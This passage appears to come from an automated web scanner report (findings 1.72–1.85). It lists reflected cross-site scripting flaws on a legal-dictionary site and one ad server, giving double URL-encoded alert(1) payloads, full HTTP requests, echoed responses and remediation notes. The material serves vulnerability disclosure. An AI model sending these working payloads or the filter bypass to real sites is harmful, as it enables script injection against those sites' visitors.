The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b99db%2527%253balert%25281%2529%252f%252f0b8c9f8737b was submitted in the REST URL parameter 1. This input was echoed as b99db';alert(1)//0b8c9f8737b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PATENTSCOPE-Glossaryb99db%2527%253balert%25281%2529%252f%252f0b8c9f8737b/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 22262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
yId('define').term.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossaryb99db';alert(1)//0b8c9f8737b/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.72. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PATENTSCOPE-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb0f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e659778ceb89 was submitted in the REST URL parameter 1. This input was echoed as eb0f3"><script>alert(1)</script>659778ceb89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PATENTSCOPE-Glossaryeb0f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e659778ceb89/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/PATENTSCOPE-Glossaryeb0f3"><script>alert(1)</script>659778ceb89/">
...[SNIP]...

1.73. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PATENTSCOPE-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253eb032d614600 was submitted in the REST URL parameter 1. This input was echoed as 1ac9f<script>alert(1)</script>b032d614600 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PATENTSCOPE-Glossary1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253eb032d614600/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:51 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>b032d614600/">PATENTSCOPE Glossary1ac9f<script>alert(1)</script>b032d614600</a>
...[SNIP]...

1.74. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c16d%253cscript%253ealert%25281%2529%253c%252fscript%253eedb06a41a53 was submitted in the REST URL parameter 1. This input was echoed as 4c16d<script>alert(1)</script>edb06a41a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treaty4c16d%253cscript%253ealert%25281%2529%253c%252fscript%253eedb06a41a53 HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:46 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 20970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>edb06a41a53">PCT-(Patent-Cooperation-Treaty4c16d<script>alert(1)</script>edb06a41a53</a>
...[SNIP]...

1.75. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43bc9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81a198545f7 was submitted in the REST URL parameter 1. This input was echoed as 43bc9"><script>alert(1)</script>81a198545f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treaty43bc9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81a198545f7 HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:11 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 20664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<meta name="description" content="PCT-(Patent-Cooperation-Treaty43bc9"><script>alert(1)</script>81a198545f7 according to the free Patent & Trademark Dictionaries. This online database of patent and trademark dictionaries offers you a quick reference tool on the field of intellectual property law." />
...[SNIP]...

1.76. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fb5b9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1b08f5908ce was submitted in the REST URL parameter 1. This input was echoed as fb5b9</title><script>alert(1)</script>1b08f5908ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treatyfb5b9%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1b08f5908ce HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:18:00 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 20892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>PCT-(Patent-Cooperation-Treatyfb5b9</title><script>alert(1)</script>1b08f5908ce meaning | Patent & Trademark Dictionaries</title>
...[SNIP]...

1.77. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty)-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4215f%2527%253balert%25281%2529%252f%252f3a445af1c45 was submitted in the REST URL parameter 1. This input was echoed as 4215f';alert(1)//3a445af1c45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treaty)-Glossary4215f%2527%253balert%25281%2529%252f%252f3a445af1c45/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
alue;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary4215f';alert(1)//3a445af1c45/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.78. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty)-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc583%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6627326016e was submitted in the REST URL parameter 1. This input was echoed as dc583"><script>alert(1)</script>6627326016e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treaty)-Glossarydc583%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6627326016e/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/PCT-(Patent-Cooperation-Treaty)-Glossarydc583"><script>alert(1)</script>6627326016e/">
...[SNIP]...

1.79. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty)-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe009%253cscript%253ealert%25281%2529%253c%252fscript%253e5b0f5a47fd1 was submitted in the REST URL parameter 1. This input was echoed as fe009<script>alert(1)</script>5b0f5a47fd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treaty)-Glossaryfe009%253cscript%253ealert%25281%2529%253c%252fscript%253e5b0f5a47fd1/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:51 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>5b0f5a47fd1/">PCT (Patent Cooperation Treaty) Glossaryfe009<script>alert(1)</script>5b0f5a47fd1</a>
...[SNIP]...

1.80. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PCT-(Patent-Cooperation-Treaty)-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload d69e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdc7d797cbe was submitted in the REST URL parameter 1. This input was echoed as d69e8</title><script>alert(1)</script>cdc7d797cbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PCT-(Patent-Cooperation-Treaty)-Glossaryd69e8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdc7d797cbe/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:32 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>PCT (Patent Cooperation Treaty) Glossaryd69e8</title><script>alert(1)</script>cdc7d797cbe Dictionary | Online Legal Dictionary</title>
...[SNIP]...

1.81. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /USPTO-Patent-and-Trademark-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5007%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6288192aa19 was submitted in the REST URL parameter 1. This input was echoed as c5007"><script>alert(1)</script>6288192aa19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /USPTO-Patent-and-Trademark-Glossaryc5007%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6288192aa19/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/USPTO-Patent-and-Trademark-Glossaryc5007"><script>alert(1)</script>6288192aa19/">
...[SNIP]...

1.82. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /USPTO-Patent-and-Trademark-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ad8e%253cscript%253ealert%25281%2529%253c%252fscript%253edecef8523e5 was submitted in the REST URL parameter 1. This input was echoed as 3ad8e<script>alert(1)</script>decef8523e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /USPTO-Patent-and-Trademark-Glossary3ad8e%253cscript%253ealert%25281%2529%253c%252fscript%253edecef8523e5/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:51 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>decef8523e5/">USPTO Patent &amp; Trademark Glossary3ad8e<script>alert(1)</script>decef8523e5</a>
...[SNIP]...

1.83. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /USPTO-Patent-and-Trademark-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb721%2527%253balert%25281%2529%252f%252fa9ac756dc6a was submitted in the REST URL parameter 1. This input was echoed as fb721';alert(1)//a9ac756dc6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /USPTO-Patent-and-Trademark-Glossaryfb721%2527%253balert%25281%2529%252f%252fa9ac756dc6a/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 22940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
erm.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossaryfb721';alert(1)//a9ac756dc6a/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.84. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /USPTO-Patent-and-Trademark-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload ca830%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06ba4666abd was submitted in the REST URL parameter 1. This input was echoed as ca830</title><script>alert(1)</script>06ba4666abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /USPTO-Patent-and-Trademark-Glossaryca830%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06ba4666abd/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:31 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>USPTO Patent &amp; Trademark Glossaryca830</title><script>alert(1)</script>06ba4666abd Dictionary | Online Legal Dictionary</title>
...[SNIP]...

1.85. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 2229e<script>alert(1)</script>c9838882a4f was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1291038775452&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8386094022769928&slotname=Vertical_babylon_DL_Banner_910x1902229e<script>alert(1)</script>c9838882a4f&page_slots=Vertical_babylon_DL_Banner_910x190&cookie_enabled=1&ga_vid=1057535273.1291038775&ga_sid=1291038775&ga_hid=1330660784&url=http%3A%2F%2Fwebcache.googleusercontent.com%2Fsearch%3Fq%3Dcache%3AcyhBgjTvtJEJ%3Adivorcelaw.legaldictionaries.org%2FMassachusetts-Divorce-Law-Dictionary%2FAbandonment%2Bmassachusetts%2Bdivorce%2Babandonment%26cd%3D2%26hl%3Den%26ct%3Dclnk%26gl%3Dus&lmt=NaN&dt=1291038775457&cc=40&biw=1597&bih=817&ifi=1&adk=3513650165&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=6&u_nmime=40&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2299144/842048/14940,996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 29 Nov 2010 17:00:29 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2728

GA_googleSetAdContentsBySlotForSync({"Vertical_babylon_DL_Banner_910x1902229e<script>alert(1)</script>c9838882a4f":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

1.86. http://research.lawyers.com/Massachusetts/Divorce-in-Massachusetts.html/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://research.lawyers.com
